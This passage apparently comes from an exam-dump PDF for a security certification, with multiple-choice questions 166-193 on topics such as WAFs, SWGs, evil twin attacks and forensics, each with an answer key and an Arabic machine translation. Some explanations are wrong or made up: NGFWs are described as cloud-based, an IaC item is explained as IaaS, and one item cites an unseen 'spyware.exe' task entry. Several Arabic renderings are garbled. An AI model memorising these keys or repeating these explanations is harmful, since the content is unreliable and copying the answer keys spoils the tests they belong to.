166. Which of the following environments can be stood up in a short period of time, utilizes either dummy
data or actual data, and is used to demonstrate and model system capabilities and functionality for a
fixed, agreed-upon duration of time?
A. PoC
B. Production
C. Test
D. Development
Answer: A
Explanation:
A proof of concept (PoC) environment can be stood up quickly and is used to demonstrate and model
system capabilities and functionality for a fixed, agreed-upon duration of time. This environment can
utilize either dummy data or actual data.
‫ وتستخدم‬، ‫ وتستخدم إما بيانات وهمية أو بيانات فعلية‬، ‫أي من البيئات التالية يمكن الوقوف عليها في فترة زمنية قصيرة‬
‫لتوضيح ونمذجة قدرات النظام ووظائفه لفترة زمنية ثابتة ومتفق عليها؟ بوس‬
‫) بسرعة وتستخدم لتوضيح ونمذجة قدرات النظام ووظائفه لفترة زمنية‬PoC( ‫ يمكن الوقوف على بيئة إثبات المفهوم‬:‫تفسير‬
.‫ يمكن لهذه البيئة استخدم إما البيانات الوهمية أو البيانات الفعلية‬.‫ثابتة ومتفق عليها‬
167. Which of the following controls would be the MOST cost-effective and time-efficient to deter
intrusions at the perimeter of a restricted, remote military training area? (Select TWO).
A. Barricades
B. Thermal sensors
C. Drones
D. Signage
E. Motion sensors
F. Guards
G. Bollards
Answer: A,D
Explanation:
Barricades and signage are the most cost-effective and time-efficient controls to deter intrusions at the
perimeter of a restricted, remote military training area.
‫أي من الضوابط التالية سيكون الأكثر فعالية من حيث التكلفة وفعالية من حيث الوقت لردع عمليات الاقتحام في محيط‬
‫ المتاريس _ لافتات‬.)‫منطقة تدريب عسكرية مقيدة ونائية؟ (اختر اثنين‬
‫ المتاريس واللافتات هي أكثر أدوات التحكم فعالية من حيث التكلفة والوقت لردع عمليات الاقتحام في محيط منطقة‬:‫تفسير‬
.‫تدريب عسكرية مقيدة ونائية‬
85 / 198
The safer , easier way to help you pass any IT exams.
168.A security engineer is installing a WAF to protect the company's website from malicious web
requests over SSL.Which of the following is needed to meet the objective?
A. A reverse proxy
B. A decryption certificate
C. A split-tunnel VPN
D. Load-balanced servers
Answer: B
Explanation:
A Web Application Firewall (WAF) is a security solution that protects web applications from various types
of attacks such as SQL injection, cross-site scripting (XSS), and others. It is typically deployed in front of
web servers to inspect incoming traffic and filter out malicious requests.
To protect the company’s website from malicious web requests over SSL, a decryption certificate is
needed to decrypt the SSL traffic before it reaches the WAF. This allows the WAF to inspect the traffic
and filter out malicious requests.
‫يقوم مهندس أمن بتركيب‬WAF ‫ لحماية موقع الشركة على الويب من طلبات الويب الضارة عبر‬SSL ‫ أي مما يلي مطلوب‬.
‫لتحقيق الهدف؟‬
‫شهادة فك التشفير‬
SQL ‫) هو حل أمني يحمي تطبيقات الويب من أنواع مختلفة من الهجمات مثل حقن‬WAF( ‫ جدار حماية تطبيق الويب‬:‫تفسير‬
‫ يتم نشره عادة أمام خوادم الويب لفحص حركة المرور الواردة وتصفية الطلبات‬.‫) وغيرها‬XSS( ‫والبرمجة النصية عبر المواقع‬
‫ يلزم وجود شهادة فك تشفير لفك تشفير حركة‬، SSL ‫ لحماية موقع الشركة على الويب من طلبات الويب الضارة عبر‬.‫الضارة‬
.‫ بفحص حركة المرور وتصفية الطلبات الضارة‬WAF ‫ هذا يسمح ل‬.WAF ‫ قبل أن تصل إلى‬SSL ‫مرور‬
169. While reviewing pcap data, a network security analyst is able to locate plaintext usernames and
passwords being sent from workstations to network witches.
Which of the following is the security analyst MOST likely observing?
A. SNMP traps
B. A Telnet session
C. An SSH connection
D. SFTP traffic
Answer: B
Explanation:
The security analyst is likely observing a Telnet session, as Telnet transmits data in plain text format,
including usernames and passwords.
‫ يمكن لمحلل أمان الشبكة تحديد موقع أسماء المستخدمين وكلمات المرور ذات النص العادي التي يتم‬، ‫أثناء مراجعة بيانات‬
‫ أي مما يلي يلاحظه محلل الأمن على الأرجح؟ جلسة تلنت‬.‫إرسالها من محطات العمل إلى سحرة الشبكة‬
‫ بما في ذلك أسماء‬، ‫ البيانات بتنسيق نص عادي‬Telnet ‫ حيث تنقل‬، Telnet ‫ من المحتمل أن يراقب محلل الأمان جلسة‬:‫تفسير‬
.‫المستخدمين وكلمات المرور‬
86 / 198
The safer , easier way to help you pass any IT exams.
170. The Chief Information Security Officer (CISO) has decided to reorganize security staff to concentrate
on incident response and to outsource outbound Internet URL categorization and filtering to an outside
company. Additionally, the CISO would like this solution to provide the same protections even when a
company laptop or mobile device is away from a home office.
Which of the following should the CISO choose?
A. CASB
B. Next-generation SWG
C. NGFW
D. Web-application firewall
Answer: B
Explanation:
The solution that the CISO should choose is Next-generation Secure Web Gateway (SWG), which
provides URL filtering and categorization to prevent users from accessing malicious sites, even when
they are away from the office. NGFWs are typically cloud-based and offer multiple security layers,
including malware detection, intrusion prevention, and data loss prevention.
‫) إعادة تنظيم موظفي الأمن للتركيز على الاستجابة للحوادث والاستعانة بمصادر‬CISO( ‫قرر كبير موظفي أمن المعلومات‬
‫ في أن يوفر هذا‬CISO ‫ يرغب‬، ‫ بالإضافة إلى ذلك‬.‫ الصادرة للإنترنت وتصفيتها لشركة خارجية‬URL ‫خارجية لتصنيف عناوين‬
‫ أي مما يلي‬.‫الحل نفس الحماية حتى عندما يكون الكمبيوتر المحمول أو الجهاز المحمول للشركة بعيدا عن المكتب المنزلي‬
SWG ‫؟ الجيل التالي من‬CISO ‫يجب أن يختاره‬
URL ‫ والتي توفر تصفية عناوين‬، )SWG( ‫ هو الجيل التالي من بوابة الويب الآمنة‬CISO ‫ الحل الذي يجب أن يختاره‬:‫تفسير‬
NGFWs ‫ عادة ما تكون‬.‫ حتى عندما يكونون بعيدا عن المكتب‬، ‫وتصنيفها لمنع المستخدمين من الوصول إلى المواقع الضارة‬
.‫ بما في ذلك اكتشاف البرامج الضارة ومنع التطفل ومنع فقدان البيانات‬، ‫قائمة على السحابة وتوفر طبقات أمان متعددة‬
171.A store receives reports that shoppers’ credit card information is being stolen. Upon further analysis,
those same shoppers also withdrew money from an ATM in that store.
The attackers are using the targeted shoppers’ credit card information to make online purchases.
Which of the following attacks is the MOST probable cause?
A. Identity theft
B. RFID cloning
C. Shoulder surfing
D. Card skimming
Answer: D
Explanation:
The attackers are using card skimming to steal shoppers' credit card information, which they use to
make online purchases.
‫ قام هؤلاء‬، ‫ بعد إجراء مزيد من التحليل‬.‫ يتلقى متجر تقارير تفيد بسرقة معلومات بطاقة ائتمان المتسوقين‬-171
‫ يستخدم المهاجمون‬.‫المتسوقون أنفسهم أيضا بسحب الأموال من ماكينة الصراف الآلي في هذا المتجر‬
‫ أي من الهجمات التالية هو‬.‫معلومات بطاقة ائتمان المتسوقين المستهدفين لإجراء عمليات شراء عبر الإنترنت‬
‫السبب الأكثر احتمالا؟ كشط البطاقه‬
‫ والتي يستخدمونها لإجراء عمليات‬، ‫ يستخدم المهاجمون كشط البطاقة لسرقة معلومات بطاقة ائتمان المتسوقين‬:‫تفسير‬
.‫شراء عبر الإنترنت‬
87 / 198
The safer , easier way to help you pass any IT exams.
172. Hackers recently attacked a company's network and obtained several unfavorable pictures from the
Chief Executive Officer's workstation. The hackers are threatening to send the images to the press if a
ransom is not paid. Which of the following is impacted the MOST?
A. Identify theft
B. Data loss
C. Data exfiltration
D. Reputation
Answer: D
Explanation:
The best option that describes what is impacted the most by the hackers’ attack and threat would be
D. Reputation. Reputation is the perception or opinion that others have about a person or an
organization. Reputation can affect the trust, credibility, and success of a person or an organization. In
this scenario, if the hackers send the unfavorable pictures to the press, it can damage the reputation of
the Chief Executive Officer and the company, and cause negative consequences such as loss of
customers, partners, investors, or employees.
‫ يهدد‬.‫هاجم قراصنة مؤخرا شبكة شركة وحصلوا على العديد من الصور غير المواتية من محطة عمل الرئيس التنفيذي‬
‫ أي مما يلي يتأثر أكثر؟ ذكر‬.‫المتسللون بإرسال الصور إلى الصحافة إذا لم يتم دفع فدية‬
‫ السمعة هي التصور أو‬.‫ السمعة‬.‫ سيكون الخيار الأفضل الذي يصف أكثر ما يتأثر بهجوم المتسللين وتهديدهم هو د‬:‫تفسير‬
‫ في هذا‬.‫ يمكن أن تؤثر السمعة على ثقة ومصداقية ونجاح شخص أو مؤسسة‬.‫الرأي الذي لدى الآخرين حول شخص أو منظمة‬
‫ فقد يؤدي ذلك إلى الإضرار بسمعة الرئيس التنفيذي‬، ‫ إذا أرسل المتسللون الصور غير المواتية إلى الصحافة‬، ‫السيناريو‬
.‫ والتسبب في عواقب سلبية مثل فقدان العملاء أو الشركاء أو المستثمرين أو الموظفين‬، ‫والشركة‬
173. An enterprise has hired an outside security firm to facilitate penetration testing on its network and
applications. The firm has agreed to pay for each vulnerability that ts discovered.
Which of the following BEST represents the type of testing that is being used?
A. White-box
B. Red-leam
C. Bug bounty
D. Gray-box
E. Black-box
Answer: C
Explanation:
Bug bounty is a type of testing in which an organization offers a reward or compensation to anyone who
can identify vulnerabilities or security flaws in their network or applications. The outside security firm has
agreed to pay for each vulnerability found, which is an example of a bug bounty program.
‫ وافقت الشركة على دفع ثمن كل ثغرة‬.‫استأجرت مؤسسة شركة أمنية خارجية لتسهيل اختبار الاختراق على شبكتها وتطبيقاتها‬
‫ أي من أفضل ما يلي يمثل نوع الاختبار المستخدم؟ علة مكافاة‬.ts ‫اكتشفتها‬
‫ مكافأة الأخطاء هي نوع من الاختبارات التي تقدم فيها المؤسسة مكافأة أو تعويضا لأي شخص يمكنه تحديد نقاط‬:‫تفسير‬
‫ وافقت شركة الأمن الخارجية على الدفع مقابل كل ثغرة أمنية تم العثور‬.‫الضعف أو العيوب الأمنية في شبكتها أو تطبيقاتها‬
.‫ وهو مثال على برنامج مكافأة الأخطاء‬، ‫عليها‬
88 / 198
The safer , easier way to help you pass any IT exams.
174. Which of the following in a forensic investigation should be priorities based on the order of volatility?
(Select TWO).
A. Page files
B. Event logs
C. RAM
D. Cache
E. Stored files
F. HDD
Answer: C,D
Explanation:
In a forensic investigation, volatile data should be collected first, based on the order of volatility. RAM
and Cache are examples of volatile data.
‫ رام وكاش‬.)‫أي مما يلي في التحقيق الجنائي يجب أن يكون أولويات بناء على ترتيب التقلب؟ (اختر اثنين‬
‫ ذاكرة الوصول العشوائي وذاكرة‬.‫ بناء على ترتيب التقلب‬، ‫ يجب جمع البيانات المتقلبة أولا‬، ‫ في تحقيق الطب الشرعي‬:‫تفسير‬
.‫التخزين المؤقت هي أمثلة على البيانات المتقلبة‬
175.A user reports trouble using a corporate laptop. The laptop freezes and responds slowly when
writing documents and the mouse pointer occasional disappears.
The task list shows the following results:
Which of the following is MOST likely the issue?
A. RAT
B. PUP
C. Spyware
D. Keylogger
Answer: C
Explanation:
Spyware is malicious software that can cause a computer to slow down or freeze. It can also cause the
mouse pointer to disappear. The task list shows an application named "spyware.exe" running, indicating
that spyware is likely the issue.
‫ يتجمد الكمبيوتر المحمول ويستجيب ببطء عند كتابة‬.‫ أبلغ مستخدم عن مشكلة في استخدام كمبيوتر محمول للشركات‬-175
‫ أي مما يلي هو المشكلة على الأرجح؟‬:‫ تعرض قائمة المهام النتائج التالية‬.‫المستندات ويختفي مؤشر الماوس من حين لآخر‬
‫برامج التجسس‬
‫ يمكن أن يتسبب أيضا في اختفاء‬.‫ برامج التجسس هي برامج ضارة يمكن أن تتسبب في إبطاء الكمبيوتر أو تجميده‬:‫تفسير‬
‫ مما يشير إلى أن برامج التجسس هي‬،‫" قيد التشغيل‬exe.‫ تعرض قائمة المهام تطبيقا باسم "برامج التجسس‬.‫مؤشر الماوس‬
.‫المشكلة على الأرجح‬
89 / 198
The safer , easier way to help you pass any IT exams.
176.Which of the technologies is used to actively monitor for specific file types being transmitted on the
network?
A. File integrity monitoring
B. Honeynets
C. Tcpreplay
D. Data loss prevention
Answer: D
Explanation:
Data loss prevention (DLP) is a technology used to actively monitor for specific file types being
transmitted on the network. DLP solutions can prevent the unauthorized transfer of sensitive information,
such as credit card numbers and social security numbers, by monitoring data in motion.
‫ما هي التكنولوجيات المستخدمة للرصد النشط لأنواع معينة من الملفات التي يتم إرسالها على الشبكة؟‬.176
‫منع فقدان البيانات‬
‫ منع النقل‬DLP ‫ يمكن لحلول‬.‫) هي تقنية تستخدم للمراقبة النشطة لأنواع ملفات معينة يتم إرسالها على الشبكة‬DLP( ‫ منع فقدان البيانات‬:‫تفسير‬
.‫ من خلال مراقبة البيانات المتحركة‬، ‫ مثل أرقام بطاقات الائتمان وأرقام الضمان الاجتماعي‬، ‫غير المصرح به للمعلومات الحساسة‬
177.A company reduced the area utilized in its datacenter by creating virtual networking through
automation and by creating provisioning routes and rules through scripting.
Which of the following does this example describe?
A. laC
B. MSSP
C. Containers
D. SaaS
Answer: A
Explanation:
laaS (Infrastructure as a Service) allows the creation of virtual networks, automation, and scripting to
reduce the area utilized in a datacenter.
‫ وخفضت إحدى الشركات المساحة المستخدمة في مركز البيانات الخاص بها عن طريق إنشاء شبكات افتراضية من خلال التشغيل الآلي وعن‬-177
‫ أي مما يلي يصفه هذا المثال؟ لك‬.‫طريق إنشاء مسارات وقواعد للتزويد من خلال البرمجة النصية‬
.‫ (البنية التحتية كخدمة) بإنشاء شبكات افتراضية وأتمتة وبرمجة نصية لتقليل المساحة المستخدمة في مركز البيانات‬laaS ‫ تسمح‬:‫تفسير‬
178.Which of the following conditions impacts data sovereignty?
A. Rights management
B. Criminal investigations
C. Healthcare data
D. International operations
Answer: D
Explanation:
Data sovereignty refers to the legal concept that data is subject to the laws and regulations of the
country in which it is located. International operations can impact data sovereignty as companies
operating in multiple countries may need to comply with different laws and regulations.
‫أي من الشروط التالية يؤثر على سيادة البيانات؟ العمليات الدولية‬.
‫ يمكن أن‬.‫ تشير سيادة البيانات إلى المفهوم القانوني القائل بأن البيانات تخضع لقوانين وأنظمة البلد الذي توجد فيه‬:‫تفسير‬
‫تؤثر العمليات الدولية على سيادة البيانات حيث قد تحتاج الشركات العاملة في بلدان متعددة إلى الامتثال لقوانين ولوائح‬
.‫مختلفة‬
90 / 198
The safer , easier way to help you pass any IT exams.
179.A company is required to continue using legacy software to support a critical service.
Which of the following BEST explains a risk of this practice?
A. Default system configuration
B. Unsecure protocols
C. Lack of vendor support
D. Weak encryption
Answer: C
Explanation:
Using legacy software to support a critical service poses a risk due to lack of vendor support. Legacy
software is often outdated and unsupported, which means that security patches and upgrades are no
longer available. This can leave the system vulnerable to exploitation by attackers who may exploit
known vulnerabilities in the software to gain unauthorized access to the system.
‫ أي مما يلي يفسر خطر هذه‬.‫ ويتعين على الشركة أن تواصل استخدام البرامج القديمة لدعم خدمة بالغة الأهمية‬-179
‫الممارسة؟ نقص دعم البائعين‬
‫ غالبا ما تكون البرامج القديمة‬.‫ يشكل استخدام البرامج القديمة لدعم خدمة مهمة خطرا بسبب نقص دعم البائعين‬:‫تفسير‬
‫ يمكن أن يترك هذا النظام عرضة للاستغلال‬.‫ مما يعني أن تصحيحات الأمان والترقيات لم تعد متوفرة‬، ‫قديمة وغير مدعومة‬
.‫من قبل المهاجمين الذين قد يستغلون نقاط الضعف المعروفة في البرنامج للوصول غير المصرح به إلى النظام‬
180. After gaining access to a dual-homed (i.e.. wired and wireless) multifunction device by exploiting a
vulnerability in the device's firmware, a penetration tester then gains shell access on another networked
asset.
This technique is an example of:
A. privilege escalation
B. footprinting
C. persistence
D. pivoting.
Answer: D
Explanation:
The technique of gaining access to a dual-homed multifunction device and then gaining shell access on
another networked asset is an example of pivoting.
‫بعد الوصول إلى جهاز متعدد الوظائف مزدوج المنزل (أي سلكي ولاسلكي) من خلال استغلال ثغرة أمنية في البرامج الثابتة‬
‫ هذه التقفنية هي مثال ؟ المتحور‬.‫ على أصل آخر متصل بالشبكة‬shell ‫ يكتسب اختبار الاختراق بعد ذلك وصولا إلى‬، ‫للجهاز‬
‫ على أصل آخر متصل‬shell ‫ تعد تقنية الوصول إلى جهاز متعدد الوظائف ثنائي المنزل ثم الحصول على وصول‬:‫تفسير‬
.‫بالشبكة مثالا على التمحور‬
91 / 198
The safer , easier way to help you pass any IT exams.
181. The Chief information Security Officer has directed the security and networking team to retire the
use of shared passwords on routers and switches.
Which of the following choices BEST meets the requirements?
A. SAML
B. TACACS+
C. Password vaults
D. OAuth
Answer: B
Explanation:
TACACS+ is a protocol used for remote authentication, authorization, and accounting (AAA) that can be
used to replace shared passwords on routers and switches. It provides a more secure method of
authentication that allows for centralized management of access control policies.
‫وقد أوعز كبير موظفي أمن المعلومات إلى فريق الأمن والربط الشبكي بالتوقف عن استخدام كلمات السر المشتركة على‬
‫ أي من الخيارات التالية يلبي المتطلبات بشكل أفضل؟ تاكاكس‬.‫أجهزة التوجيه والمحولات‬
‫) يمكن استخدامه لاستبدال كلمات‬AAA( ‫ هو بروتوكول يستخدم للمصادقة عن بعد والتخويل والمحاسبة‬+ TACACS :‫تفسير‬
‫ يوفر طريقة أكثر أمانا للمصادقة تسمح بالإدارة المركزية لسياسات التحكم‬.‫المرور المشتركة على أجهزة التوجيه والمحولات‬
.‫في الوصول‬
182.A global company is experiencing unauthorized logging due to credential theft and account lockouts
caused by brute-force attacks. The company is considering implementing a third-party identity provider to
help mitigate these attacks.
Which of the following would be the BEST control for the company to require from prospective vendors?
A. IP restrictions
B. Multifactor authentication
C. A banned password list
D. A complex password policy
Answer: B
Explanation:
Multifactor authentication (MFA) would be the best control to require from a third-party identity provider to
help mitigate attacks such as credential theft and brute-force attacks.
‫وتعاني شركة عالمية من تسجيل غير مأذون به بسبب سرقة بيانات الاعتماد وإغلاق الحسابات بسبب هجمات القوة‬-182
‫ أي مما يلي سيكون‬.‫ تدرس الشركة تنفيذ مزود هوية تابع لجهة خارجية للمساعدة في التخفيف من هذه الهجمات‬.‫الغاشمة‬
‫أفضل تحكم تطلبه الشركة من البائعين المحتملين؟ مصادقة متعددة العوامل‬
‫) أفضل عنصر تحكم تطلبه من موفر هوية تابع لجهة خارجية للمساعدة في‬MFA( ‫ ستكون المصادقة متعددة العوامل‬:‫تفسير‬
.‫التخفيف من الهجمات مثل سرقة بيانات الاعتماد وهجمات القوة الغاشمة‬
92 / 198
The safer , easier way to help you pass any IT exams.
183.The SIEM at an organization has detected suspicious traffic coming a workstation in its internal
network. An analyst in the SOC the workstation and discovers malware that is associated with a botnet is
installed on the device A review of the logs on the workstation reveals that the privileges of the local
account were escalated to a local administrator.
To which of the following groups should the analyst report this real-world event?
A. The NOC team
B. The vulnerability management team
C. The CIRT
D. The read team
Answer: C
Explanation:
The Computer Incident Response Team (CIRT) is responsible for handling incidents and ensuring that
the incident response plan is followed.
‫ محلل في‬.‫ في إحدى المنظمات عن حركة مرور مشبوهة قادمة من محطة عمل في شبكتها الداخلية‬SIEM ‫ وكشف نظام‬-183
‫ محطة العمل ويكتشف البرامج الضارة المرتبطة بشبكة الروبوت مثبتة على الجهاز تكشف مراجعة السجلات على محطة‬SOC
‫ إلى أي من المجموعات التالية يجب على المحلل الإبلاغ‬.‫العمل أنه تم تصعيد امتيازات الحساب المحلي إلى مسؤول محلي‬
‫عن هذا الحدث الحقيقي؟ ذا كرت‬
.‫) مسؤول عن التعامل مع الحوادث وضمان اتباع خطة الاستجابة للحوادث‬CIRT( ‫ فريق الاستجابة للحوادث الحاسوبية‬:‫تفسير‬
184.A company is required to continue using legacy software to support a critical service.
Which of the following BEST explains a risk of this practice?
A. Default system configuration
B. Unsecure protocols
C. Lack of vendor support
D. Weak encryption
Answer: C
Explanation:
One of the risks of using legacy software is the lack of vendor support. This means that the vendor may
no longer provide security patches, software updates, or technical support for the software. This leaves
the software vulnerable to new security threats and vulnerabilities that could be exploited by attackers.
‫ أي مما يلي يفسر خطر هذه‬.‫ و يتعين على الشركة أن تواصل استخدام البرامج القديمة لدعم خدمة بالغة الأهمية‬-184
‫الممارسة؟ نقص دعم البائعين‬
‫ هذا يعني أن المورد قد لا يوفر تصحيحات الأمان أو‬.‫ أحد مخاطر استخدام البرامج القديمة هو نقص دعم البائعين‬:‫تفسير‬
‫ هذا يترك البرنامج عرضة للتهديدات الأمنية الجديدة ونقاط الضعف التي يمكن‬.‫تحديثات البرامج أو الدعم الفني للبرنامج‬
.‫استغلالها من قبل المهاجمين‬
93 / 198
The safer , easier way to help you pass any IT exams.
185.A security manager needs to assess the security posture of one of the organization's
vendors. The contract with the vendor does not allow for auditing of the vendor's security controls.
Which of the following should the manager request to complete the assessment?
A. A service-level agreement
B. A business partnership agreement
C. A SOC 2 Type 2 report
D. A memorandum of understanding
Answer: C
Explanation:
The security manager should request a SOC 2 Type 2 report to assess the security posture of the
vendor.
.‫ ولا يسمح العقد المبرم مع البائع بمراجعة الضوابط الأمنية للبائع‬.‫ و يحتاج مدير الأمن إلى تقييم الوضع الأمني لأحد موردي المنظمة‬-185
‫أي مما يلي يجب أن يطلبه المدير لإكمال التقييم؟‬
186.A security analyst reports a company policy violation in a case in which a large amount of sensitive
data is being downloaded after hours from various mobile devices to an external site. Upon further
investigation, the analyst notices that successful login attempts are being conducted with impossible
travel times during the same time periods when the unauthorized downloads are occurring. The analyst
also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP
configurations and an overlapping channel.
Which of the following attacks is being conducted?
A. Evil twin
B. Jamming
C. DNS poisoning
D. Bluesnarfing
E. DDoS
Answer: A
Explanation:
The attack being conducted is an Evil twin attack. An Evil twin attack involves creating a rogue wireless
access point (WAP) with the same Service Set Identifier (SSID) as a legitimate WAP to trick users into
connecting to it. Once connected, the attacker can intercept traffic or steal login credentials. The
successful login attempts with impossible travel times suggest that an attacker is using a stolen or
compromised credential to access the external site to which the sensitive data is being downloaded. The
non-standard DHCP configurations and overlapping channels of the WAPs suggest that the attacker is
using a rogue WAP to intercept traffic.
‫ أبلغ محلل أمني عن انتهاك لسياسة الشركة في حالة يتم فيها تنزيل كمية كبيرة من البيانات الحساسة بعد ساعات من أجهزة محمولة‬-186
‫ يلاحظ المحلل أن محاولات تسجيل الدخول الناجحة يتم إجراؤها مع أوقات سفر‬، ‫ عند إجراء مزيد من التحقيق‬.‫مختلفة إلى موقع خارجي‬
‫ يكتشف المحلل أيضا أن اثنين من‬.‫مستحيلة خلال نفس الفترات الزمنية التي تحدث فيها التنزيلات غير المصرح بها‬WAPs ‫يستخدمان‬
‫نفس‬SSID ‫ لكن لديهما تكوينات‬، DHCP‫ أي من الهجمات التالية يتم تنفيذها؟ التوأم الشرير‬.‫غير قياسية وقناة متداخلة‬
‫) بنفس معرف‬WAP( ‫ يتضمن الهجوم المزدوج الشرير إنشاء نقطة وصول لاسلكية مارقة‬.‫ الهجوم الذي يتم إجراؤه هو هجوم مزدوج شرير‬:‫تفسير‬
‫ يمكن للمهاجم اعتراض حركة المرور أو سرقة بيانات‬، ‫ بمجرد الاتصال‬.‫ شرعي لخداع المستخدمين للاتصال بها‬WAP‫) ك‬SSID( ‫مجموعة الخدمات‬
‫ تشير محاولات تسجيل الدخول الناجحة مع أوقات السفر المستحيلة إلى أن المهاجم يستخدم بيانات اعتماد مسروقة أو‬.‫اعتماد تسجيل الدخول‬
‫ إلى‬WAPs ‫ غير القياسية والقنوات المتداخلة ل‬DHCP ‫ تشير تكوينات‬.‫مخترقة للوصول إلى الموقع الخارجي الذي يتم تنزيل البيانات الحساسة إليه‬
.‫ مارقا لاعتراض حركة المرور‬WAP ‫أن المهاجم يستخدم‬
94 / 198
The safer , easier way to help you pass any IT exams.
187.Which of the following environments would MOST likely be used to assess the execution of
component parts of a system at both the hardware and software levels and to measure performance
characteristics?
A. Test
B. Staging
C. Development
D. Production
Answer: A
Explanation:
The test environment is used to assess the execution of component parts of a system at both the
hardware and software levels and to measure performance characteristics.
‫أي من البيئات التالية ستستخدم على الأرجح لتقييم تنفيذ الأجزاء المكونة للنظام على مستوى المعدات والبرمجيات ولقياس‬.187
‫ تستخدم بيئة الاختبار لتقييم تنفيذ الأجزاء المكونة للنظام على مستوى الأجهزة والبرامج ولقياس‬:‫خصائص الأداء؟ اختبر تفسير‬
.‫خصائص الأداء‬
188.A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new
ERP system tor the company. The CISO categorizes the system, selects the controls mat apply to the
system, implements the controls, and then assesses the success of the controls before authorizing the
system. Which of the following is the CISO using to evaluate Hie environment for this new ERP system?
A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framevtoik
D. ISO 27002
Answer: C
Explanation:
The CISO is using the NIST Risk Management Framework (RMF) to evaluate the environment for the
new ERP system. The RMF is a structured process for managing risks that involves categorizing the
system, selecting controls, implementing controls, assessing controls, and authorizing the system.
‫) بتقييم المخاطر التي ينطوي عليها نشر نظام جديد لتخطيط موارد المؤسسات‬CISO( ‫ ويقوم كبير موظفي أمن المعلومات‬-188
‫ ثم يقيم‬، ‫ وينفذ عناصر التحكم‬، ‫ ويحدد حصيرة عناصر التحكم التي تنطبق على النظام‬، ‫ بتصنيف النظام‬CISO ‫ يقوم‬.‫في الشركة‬
‫ الجديد هذا؟‬ERP ‫ لنظام‬Hie ‫ لتقييم بيئة‬CISO ‫ أي مما يلي يستخدمه‬.‫نجاح عناصر التحكم قبل تفويض نظام‬
A. NIST Risk Management Framevtoik
‫ صندوق رينه معوض‬.‫) لتقييم البيئة لنظام تخطيط موارد المؤسسات الجديد‬RMF( NIST ‫ إطار إدارة المخاطر‬CISO ‫ يستخدم‬:‫تفسير‬
.‫هو عملية منظمة لإدارة المخاطر تتضمن تصنيف النظام واختيار الضوابط وتنفيذ الضوابط وتقييم الضوابط وتفويض النظام‬
95 / 198
The safer , easier way to help you pass any IT exams.
189.DRAG DROP
A data owner has been tasked with assigning proper data classifications and destruction methods forvarious types of data
contained within the environment.
.‫سحب إسقاط تم تكليف مالك البيانات بتعيين تصنيفات البيانات المناسبة وطرق التدمير لأنواع مختلفة من البيانات الموجودة في البيئة‬.189
Answer:
96 / 198
The safer , easier way to help you pass any IT exams.
190.A Chief Information Security Officer (CISO) wants to implement a new solution that can protect
against certain categories of websites, whether the employee is in the offer or away.
Which of the following solutions should the CISO implement?
A. VAF
B. SWG
C. VPN
D. WDS
Answer: B
Explanation:
A secure web gateway (SWG) is a solution that can filter and block malicious or inappropriate web traffic
based on predefined policies. It can protect users from web-based threats, such as malware, phishing, or
ransomware, whether they are in the office or away. An SWG can be deployed as a hardware appliance,
a software application, or a cloud service.
‫ سواء كان الموظف في العرض أو‬،‫ويريد كبير موظفي أمن المعلومات تنفيذ حل جديد يمكن أن يحمي من فئات معينة من المواقع الشبكية‬-190
‫ تنفيذها؟ سوج‬CISO ‫ أي من الحلول التالية يجب على‬.‫خارجه‬
.‫) هي حل يمكنه تصفية حركة مرور الويب الضارة أو غير المناسبة وحظرها بناء على سياسات محددة مسبقا‬SWG( ‫ بوابة الويب الآمنة‬:‫تفسير‬
‫ سواء كانوا في المكتب أو‬، ‫ مثل البرامج الضارة أو التصيد الاحتيالي أو برامج الفدية‬، ‫يمكنه حماية المستخدمين من التهديدات المستندة إلى الويب‬
.‫ كجهاز أو تطبيق برمجي أو خدمة سحابية‬SWG ‫ يمكن نشر‬.‫بعيدا‬
191. Which of the following would provide guidelines on how to label new network devices as part of the
initial configuration?
A. IP schema
B. Application baseline configuration
C. Standard naming convention policy
D. Wireless LAN and network perimeter diagram
Answer: C
Explanation:
A standard naming convention policy would provide guidelines on how to label new network devices as
part of the initial configuration. A standard naming convention policy is a document that defines the rules
and formats for naming network devices, such as routers, switches, firewalls, servers, or printers. A
standard naming convention policy can help an organization achieve consistency, clarity, and efficiency
in network management and administration.
‫أي مما يلي سيوفر إرشادات حول كيفية تسمية أجهزة الشبكة الجديدة كجزء من التكوين الأولي؟‬
‫سياسة اصطلاح التسمية القياسية‬
.‫ ستوفر سياسة اصطلاح التسمية القياسية إرشادات حول كيفية تسمية أجهزة الشبكة الجديدة كجزء من التكوين الأولي‬:‫تفسير‬
‫ مثل أجهزة التوجيه أو‬،‫نهج اصطلاح التسمية القياسي هو مستند يحدد القواعد والتنسيقات الخاصة بتسمية أجهزة الشبكة‬
‫ يمكن أن تساعد سياسة اصطلاح التسمية القياسية المؤسسة على تحقيق‬.‫المحولات أو جدران الحماية أو الخوادم أو الطابعات‬
.‫الاتساق والوضوح والكفاءة في إدارة الشبكة وإدارتها‬
97 / 198
The safer , easier way to help you pass any IT exams.
192. Which of the following best describes the situation where a successfully onboarded employee who is
using a fingerprint reader is denied access at the company's mam gate?
A. Crossover error rate
B. False match raw
C. False rejection
D. False positive
Answer: C
Explanation:
A false rejection occurs when a biometric system fails to recognize an authorized user and denies
access. This can happen due to poor quality of the biometric sample, environmental factors, or system
errors.
‫أي مما يلي يصف بشكل أفضل الموقف الذي يتم فيه منع الموظف الذي تم إعداده بنجاح والذي يستخدم قارئ بصمات الأصابع من الوصول إلى‬
‫بوابة مام الخاصة بالشركة؟ الرفض الكاذب‬
‫ يمكن أن يحدث هذا‬.‫ يحدث الرفض الخاطئ عندما يفشل نظام القياسات الحيوية في التعرف على مستخدم مصرح له ويرفض الوصول‬:‫تفسير‬
.‫بسبب رداءة جودة العينة البيومترية أو العوامل البيئية أو أخطاء النظام‬
193. Which of the following allow access to remote computing resources, a operating system. and
centrdized configuration and data?
A. Containers
B. Edge computing
C. Thin client
D. Infrastructure as a service
Answer: C
Explanation:
Thin clients are devices that have minimal hardware and software components and rely on a remote
server to provide access to computing resources, an operating system, and centralized configuration and
data. Thin clients can reduce the cost, complexity, and security risks of managing multiple devices.
‫ والتكوين المركزي والبيانات؟ جهاز عميل رفيع‬.‫ وهو نظام تشغيل‬، ‫أي مما يلي يسمح بالوصول إلى موارد الحوسبة عن بعد‬
‫ الأجهزة العميلة قليلة السمك هي أجهزة تحتوي على الحد الأدنى من مكونات الأجهزة والبرامج وتعتمد على خادم بعيد لتوفير الوصول إلى‬:‫تفسير‬
